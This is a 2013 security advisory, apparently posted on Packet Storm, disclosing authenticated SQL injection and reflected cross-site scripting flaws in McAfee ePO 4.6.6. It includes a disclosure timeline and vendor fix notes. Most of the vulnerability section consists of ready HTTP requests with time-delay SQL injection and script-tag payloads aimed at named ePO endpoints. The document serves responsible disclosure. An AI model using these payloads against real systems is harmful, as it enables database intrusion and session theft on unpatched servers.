exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection

McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection
Posted Jul 12, 2013
Authored by Nuri Fattah

McAfee ePO version 4.6.6 Build 176 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 5bc2c2825a2b841fc950d28fa7e61d6b5aadf005eca175d8a43288f8aebc17b2
Download | Favorite | View

McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection

Change Mirror Download
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC


Multiple vulnerabilities in McAfee ePO 4.6.6
 
Affected Product:
McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions
 
Timeline:
 
08 June 2013      - Vulnerability found
12 June 2013      - Vendor informed
12 June 2013      - Vendor replied/confirmed & opened service ticket
12 July 2013      - Vendor responded with dates for solutions
 
Credits:
Nuri Fattah   of NATO / NCIRC (www.ncirc.nato.int)
 
CVE: To be assigned
 
NCIRC ID: NCIRC-2013127-01
 
Description:
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL
injection were identified in the latest version of McAfee ePO (4.6.6).
All identified vulnerabilities were discovered post authentication.
 

Vulnerability Details:
 
1. SQL injection

a. GET
/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf
or%20delay'0%3a0%3a20'--
&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax
Mode=standard HTTP/1.1

b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer
&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--
&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory
%3Aquery.2&index=0 HTTP/1.1

McAfee Solution:

Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043.
(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)
 
 


2. Reflected XSS
a. POST /core/loadDisplayType.do HTTP/1.1=20
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
 
b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
 
c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&
width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo
nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard
 
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
 
e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
 
f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1
 
g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
 

h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1
 

McAfee Solution:

Each of these items will be addressed in ePO 4.6.7 due out in late Q3
2013.

  


Nuri FATTAH
CTR
NATO Communications and Information Agency
Engineering & Vulnerability Management Sections
NATO Information Assurance Technical Centre
SHAPE, 7010 Mons, Belgium
T: +32 6544 6140 F: +32 6544 5414
SHAPE NCN:       254 6140
E: nuri.fattah@ncirc.nato.int  W: www.ncirc.nato.int


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close